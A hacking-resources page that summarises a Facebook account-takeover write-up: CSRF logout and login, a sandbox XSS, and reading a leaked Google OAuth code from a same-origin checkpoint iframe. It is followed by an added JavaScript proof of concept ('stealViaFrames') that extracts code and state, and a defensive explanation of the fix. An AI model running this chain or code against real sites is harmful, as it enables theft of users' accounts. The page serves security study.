Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Multiple bugs chained to takeover Facebook Accounts which uses Gmail- 1358

Youssef Sammouda, posted 2 years ago
  • Facebook has an extra security mechanism after login to confirm that the user is legitimate. This could be a captcha or MFA, but it is commonly referred to as a checkpoint. It is implemented inside an iframe served from a sandboxed URL.
  • When the checkpoint loads, the URL of the outer (top-level) page is passed along to the sandboxed iframe URL. Since the outer page can be part of an OAuth flow, the OAuth code in that URL can leak into the iframe. So if we can communicate with this iframe, we can potentially steal OAuth codes and take over accounts.
  • By chance, the author already had an XSS on the domain www.fbsbx.com. Since that domain is a sandbox, this is actually by design: on a particular page it is possible to upload HTML files that are then served from this domain.
  • To steal the URL passed to the iframe, we need a handle on two windows. First, a window showing the Facebook checkpoint page. Second, a window running our XSS on the Facebook sandbox domain.
  • To do this, we open the first window in a new tab from our malicious website. For the second, we create an iframe on our page that loads the sandbox XSS.
  • Our sandbox iframe and the checkpoint's sandbox iframe inside the opened window have the same origin (www.fbsbx.com). Hence, one can read the other's window properties, and in particular its location.href, which carries the code.
  • One other complication is that we need to force the account into this checkpoint state. A logout CSRF followed by a login CSRF does the trick. However, if we do this against Facebook directly we get nothing out of it, so the trick is to do it against an OAuth provider, like Gmail.
  • To perform the attack, do the following steps:
    1. Logout CSRF.
    2. Login CSRF.
    3. Open the Gmail OAuth provider URL that redirects back to Facebook, using window.open(). This lands on Facebook's checkpoint page, with the code present in the iframe's URL.
    4. Wait a few seconds for all of the redirects to complete.
    5. From the XSS, read the opened window's frames to get the Google OAuth code.
    6. Start the password recovery process on Facebook.com and choose to connect via Gmail.
    7. Use the stolen code and state in order to log in to Google.
  • The deep understanding of client-side security of this hacker always amazes me. On top of this, just having an XSS in the pocket was awesome. I wonder if there's a good place to find all of the client-side security things? If you see one, please let me know!
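The cross-window read at the heart of the chain, as an added example that is not code from the write-up, from Facebook, or from this page's author. It assumes a hypothetical layout: the checkpoint's sandbox iframe carries the parent page's URL in a query parameter (named `referer` here, an assumption), and the payload runs on the sandbox origin, so it may open the OAuth start URL itself and walk the new window's frames. The frame stand-ins and URLs at the bottom are constructed so the extraction logic runs outside a browser.

```javascript
// Added example: same-origin location.href leak across a window.open()'d
// window. Browser semantics used here: `win.frames` and `frames[i].location`
// are reachable on a cross-origin window, but reading `.location.href` throws
// a SecurityError unless the frame shares our origin.

// Return {code, state} from a URL. The parent page's URL is assumed to be
// embedded as a URL-valued query parameter of the iframe's own URL, so we
// check the URL itself first and then one level of nested URL parameters.
function extractOAuthParams(href) {
  const url = new URL(href);
  const direct = pickCodeAndState(url.searchParams);
  if (direct) return direct;
  for (const [, value] of url.searchParams) {
    if (!/^https?:\/\//.test(value)) continue; // only URL-shaped values
    try {
      const nested = pickCodeAndState(new URL(value).searchParams);
      if (nested) return nested;
    } catch (e) {
      // value looked like a URL but did not parse; skip it
    }
  }
  return null;
}

function pickCodeAndState(params) {
  const code = params.get('code');
  const state = params.get('state');
  return code && state ? { code, state } : null;
}

// Walk an array-like of window objects (e.g. win.frames). Cross-origin
// frames throw on href access and are skipped; a same-origin frame yields
// a readable URL that we mine for the OAuth parameters.
function findLeakedParams(frames) {
  for (let i = 0; i < frames.length; i++) {
    let href;
    try {
      href = frames[i].location.href; // throws when cross-origin
    } catch (e) {
      continue;
    }
    const found = extractOAuthParams(href);
    if (found) return found;
  }
  return null;
}

// Browser-side driver (not exercised offline): open the OAuth start URL
// (hypothetical placeholder) and poll the new window's frames until a
// same-origin frame leaks code and state, or give up after maxTries.
function stealViaFrames(startUrl, onFound, intervalMs = 500, maxTries = 40) {
  const win = window.open(startUrl, '_blank');
  let tries = 0;
  const timer = setInterval(() => {
    const found = findLeakedParams(win.frames);
    if (found || ++tries >= maxTries) {
      clearInterval(timer);
      if (found) onFound(found);
    }
  }, intervalMs);
}

// Constructed stand-ins that mimic browser behaviour for the two frame kinds.
function crossOriginFrame() {
  return { location: { get href() { throw new Error('SecurityError'); } } };
}
function sameOriginFrame(href) {
  return { location: { href } };
}

// Constructed sample: a cross-origin frame followed by a sandbox frame whose
// URL embeds the (hypothetical) OAuth callback URL of its parent page.
const SAMPLE_CALLBACK = 'https://site.example/login/callback?code=4%2FabcXYZ&state=st123';
const SAMPLE_FRAMES = [
  crossOriginFrame(),
  sameOriginFrame('https://sandbox.example/captcha/?referer=' +
    encodeURIComponent(SAMPLE_CALLBACK)),
];
```

The defensive reading of the same logic: the leak exists only because the parent page's full URL, query string included, is handed to a document on an origin that also serves user-controlled HTML. Passing the origin or path without the query, or never reflecting the parent URL at all, removes what `findLeakedParams` is looking for.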